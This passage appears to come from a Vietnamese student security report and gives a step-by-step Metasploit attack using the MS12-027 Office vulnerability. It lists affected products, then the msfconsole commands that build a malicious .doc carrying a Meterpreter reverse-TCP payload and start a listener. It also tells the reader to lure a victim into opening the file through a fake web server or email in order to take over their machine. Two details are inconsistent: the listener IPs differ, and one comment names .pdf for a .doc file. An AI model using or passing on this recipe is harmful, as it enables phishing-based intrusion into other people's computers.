4. Xâm nhập và khai thác Windows XP
4.4 Khai thác lỗ hỏng Ms12-027
a) Mô tả:
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, …)
b) Phần mềm bị ảnh hưởng: Microsoft Office 2003 Microsoft Office 2007
Microsoft Office 2010 (ngoại trừ phiên bản x64-based editions) Microsoft SQL Server 2000 Analysis Services
SVTH: Huỳnh Quốc Anh Trang 28 Microsoft SQL Server 2005 (đối với Microsoft SQL Server 2005 Express Edition chỉ thực hiện được trên Advanced Services)
Microsoft SQL Server 2008 Microsoft SQL Server 2008 R2 Microsoft BizTalk Server 2002 Microsoft Commerce Server 2002 Microsoft Commerce Server 2007 Microsoft Commerce Server 2009 Microsoft Commerce Server 2009 R2 Microsoft Visual FoxPro 8.0
Microsoft Visual FoxPro 9.0 Visual Basic 6.0 Runtime c) Cách thực hiện tấn công:
Điều kiện: Victim phải cài đặt phần mềm Microsoft Office Word 2007 Khởi động msfconsole tử cửa sổ terminal của BackTrack.
> msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options: > search ms12_027
> use exploit/windows/fileformat/ms12_027_mscomctl_bof > show options
> set filename test.doc (đây là tên do mình tự đặt với cú pháp *.pdf) > set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.192.130 > set lport 7777
> exploit
Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa mã độc, file sẽ được lưu tại root./msf4/test.doc
Tiếp tục thực hiện các bước sau: > use exploit/multi/handler
SVTH: Huỳnh Quốc Anh Trang 29 > set lhost 192.168.158.128
> exploit
Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho máy nạn nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua và chúng ta có thể chiếm quyền sử dụng máy nạn nhân